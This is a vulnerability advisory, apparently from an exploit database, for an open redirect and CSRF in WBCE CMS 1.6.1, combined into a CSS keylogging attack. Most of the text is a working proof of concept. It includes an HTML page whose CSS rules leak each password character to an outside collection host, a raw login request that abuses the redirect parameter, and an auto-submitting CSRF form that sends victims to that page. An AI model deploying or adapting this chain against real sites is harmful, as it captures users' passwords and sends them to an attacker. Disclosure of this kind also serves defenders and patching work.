WBCE CMS 1.6.1 Open Redirect & CSRF

2023.07.03
Credit: Mirabbas Ağalarov
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352
CWE-601

Exploit Title: WBCE CMS 1.6.1 - Open Redirect & CSRF Version: 1.6.1 Bugs: Open Redirect + CSRF = CSS KEYLOGGING Technology: PHP Vendor URL: https://wbce-cms.org/ Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1 Date of found: 03-07-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== 1. Login to Account 2. Go to Media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/index.php#elf_l1_Lw) 3. Then you upload html file .(html file content is as below) ''' <html> <head> <title> Login </title> <style> input[type="password"][value*="q"]{ background-image: url('https://enflownwx6she.x.pipedream.net/q');} input[type="password"][value*="w"]{ background-image: url('https://enflownwx6she.x.pipedream.net/w');} input[type="password"][value*="e"]{ background-image: url('https://enflownwx6she.x.pipedream.net/e');} input[type="password"][value*="r"]{ background-image: url('https://enflownwx6she.x.pipedream.net/r');} input[type="password"][value*="t"]{ background-image: url('https://enflownwx6she.x.pipedream.net/t');} input[type="password"][value*="y"]{ background-image: url('https://enflownwx6she.x.pipedream.net/y');} input[type="password"][value*="u"]{ background-image: url('https://enflownwx6she.x.pipedream.net/u');} input[type="password"][value*="i"]{ background-image: url('https://enflownwx6she.x.pipedream.net/i');} input[type="password"][value*="o"]{ background-image: url('https://enflownwx6she.x.pipedream.net/o');} input[type="password"][value*="p"]{ background-image: url('https://enflownwx6she.x.pipedream.net/p');} input[type="password"][value*="a"]{ background-image: url('https://enflownwx6she.x.pipedream.net/a');} input[type="password"][value*="s"]{ background-image: url('https://enflownwx6she.x.pipedream.net/s');} input[type="password"][value*="d"]{ background-image: url('https://enflownwx6she.x.pipedream.net/d');} input[type="password"][value*="f"]{ background-image: url('https://enflownwx6she.x.pipedream.net/f');} input[type="password"][value*="g"]{ background-image: url('https://enflownwx6she.x.pipedream.net/g');} input[type="password"][value*="h"]{ background-image: url('https://enflownwx6she.x.pipedream.net/h');} input[type="password"][value*="j"]{ background-image: url('https://enflownwx6she.x.pipedream.net/j');} input[type="password"][value*="k"]{ background-image: url('https://enflownwx6she.x.pipedream.net/k');} input[type="password"][value*="l"]{ background-image: url('https://enflownwx6she.x.pipedream.net/l');} input[type="password"][value*="z"]{ background-image: url('https://enflownwx6she.x.pipedream.net/z');} input[type="password"][value*="x"]{ background-image: url('https://enflownwx6she.x.pipedream.net/x');} input[type="password"][value*="c"]{ background-image: url('https://enflownwx6she.x.pipedream.net/c');} input[type="password"][value*="v"]{ background-image: url('https://enflownwx6she.x.pipedream.net/v');} input[type="password"][value*="b"]{ background-image: url('https://enflownwx6she.x.pipedream.net/b');} input[type="password"][value*="n"]{ background-image: url('https://enflownwx6she.x.pipedream.net/n');} input[type="password"][value*="m"]{ background-image: url('https://enflownwx6she.x.pipedream.net/m');} input[type="password"][value*="Q"]{ background-image: url('https://enflownwx6she.x.pipedream.net/Q');} input[type="password"][value*="W"]{ background-image: url('https://enflownwx6she.x.pipedream.net/W');} input[type="password"][value*="E"]{ background-image: url('https://enflownwx6she.x.pipedream.net/E');} input[type="password"][value*="R"]{ background-image: url('https://enflownwx6she.x.pipedream.net/R');} input[type="password"][value*="T"]{ background-image: url('https://enflownwx6she.x.pipedream.net/T');} input[type="password"][value*="Y"]{ background-image: url('https://enflownwx6she.x.pipedream.net/Y');} input[type="password"][value*="U"]{ background-image: url('https://enflownwx6she.x.pipedream.net/U');} input[type="password"][value*="I"]{ background-image: url('https://enflownwx6she.x.pipedream.net/I');} input[type="password"][value*="O"]{ background-image: url('https://enflownwx6she.x.pipedream.net/O');} input[type="password"][value*="P"]{ background-image: url('https://enflownwx6she.x.pipedream.net/P');} input[type="password"][value*="A"]{ background-image: url('https://enflownwx6she.x.pipedream.net/A');} input[type="password"][value*="S"]{ background-image: url('https://enflownwx6she.x.pipedream.net/S');} input[type="password"][value*="D"]{ background-image: url('https://enflownwx6she.x.pipedream.net/D');} input[type="password"][value*="F"]{ background-image: url('https://enflownwx6she.x.pipedream.net/F');} input[type="password"][value*="G"]{ background-image: url('https://enflownwx6she.x.pipedream.net/G');} input[type="password"][value*="H"]{ background-image: url('https://enflownwx6she.x.pipedream.net/H');} input[type="password"][value*="J"]{ background-image: url('https://enflownwx6she.x.pipedream.net/J');} input[type="password"][value*="K"]{ background-image: url('https://enflownwx6she.x.pipedream.net/K');} input[type="password"][value*="L"]{ background-image: url('https://enflownwx6she.x.pipedream.net/L');} input[type="password"][value*="Z"]{ background-image: url('https://enflownwx6she.x.pipedream.net/Z');} input[type="password"][value*="X"]{ background-image: url('https://enflownwx6she.x.pipedream.net/X');} input[type="password"][value*="C"]{ background-image: url('https://enflownwx6she.x.pipedream.net/C');} input[type="password"][value*="V"]{ background-image: url('https://enflownwx6she.x.pipedream.net/V');} input[type="password"][value*="B"]{ background-image: url('https://enflownwx6she.x.pipedream.net/B');} input[type="password"][value*="N"]{ background-image: url('https://enflownwx6she.x.pipedream.net/N');} input[type="password"][value*="M"]{ background-image: url('https://enflownwx6she.x.pipedream.net/M');} input[type="password"][value*="1"]{ background-image: url('https://enflownwx6she.x.pipedream.net/1');} input[type="password"][value*="2"]{ background-image: url('https://enflownwx6she.x.pipedream.net/2');} input[type="password"][value*="3"]{ background-image: url('https://enflownwx6she.x.pipedream.net/3');} input[type="password"][value*="4"]{ background-image: url('https://enflownwx6she.x.pipedream.net/4');} input[type="password"][value*="5"]{ background-image: url('https://enflownwx6she.x.pipedream.net/5');} input[type="password"][value*="6"]{ background-image: url('https://enflownwx6she.x.pipedream.net/6');} input[type="password"][value*="7"]{ background-image: url('https://enflownwx6she.x.pipedream.net/7');} input[type="password"][value*="8"]{ background-image: url('https://enflownwx6she.x.pipedream.net/8');} input[type="password"][value*="9"]{ background-image: url('https://enflownwx6she.x.pipedream.net/9');} input[type="password"][value*="0"]{ background-image: url('https://enflownwx6she.x.pipedream.net/0');} input[type="password"][value*="-"]{ background-image: url('https://enflownwx6she.x.pipedream.net/-');} input[type="password"][value*="."]{ background-image: url('https://enflownwx6she.x.pipedream.net/.');} input[type="password"][value*="_"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%60');} input[type="password"][value*="@"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%40');} input[type="password"][value*="?"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3F');} input[type="password"][value*=">"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3E');} input[type="password"][value*="<"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3C');} input[type="password"][value*="="]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3D');} input[type="password"][value*=":"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3A');} input[type="password"][value*=";"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3B');} </style> </head> <body> <label>Please enter username and password</label> <br><br> Password:: <input type="password" /> <script> document.querySelector('input').addEventListener('keyup', (evt)=>{ evt.target.setAttribute('value', evt.target.value); }) </script> </body> </html> ''' 4.Then go to url of html file (http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html) and copy url. 5.Then you logout account and go to again login page (http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php) POST /WBCE_CMS-1.6.1/wbce/admin/login/index.php HTTP/1.1 Host: localhost Content-Length: 160 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: phpsessid-2729-sid=3i7oqonhjf0ug0jl5dfdp4uugg Connection: close url=&username_fieldname=username_3584B221EC89&password_fieldname=password_3584B221EC89&username_3584B221EC89=test&password_3584B221EC89=Hello123%21&submit=Login 6.If write as (https://ATTACKER.com) in url parameter on abowe request on you redirect to attacker.com. 7.We write to html files url url=http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html 8.And create csrf-poc with csrf.poc.generator <html> <title> This CSRF was found by miri </title> <body> <h1> CSRF POC </h1> <form action="http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php" method="POST" enctype="application/x-www-form-urlencoded"> <input type="hidden" name="url" value="http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html" /> </form> <script>document.forms[0].submit();</script> </body> </html> 9.If victim click , ht redirect to html file and this page send to my server all keyboard activity of victim. Poc video : https://youtu.be/m-x_rYXTP9E


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top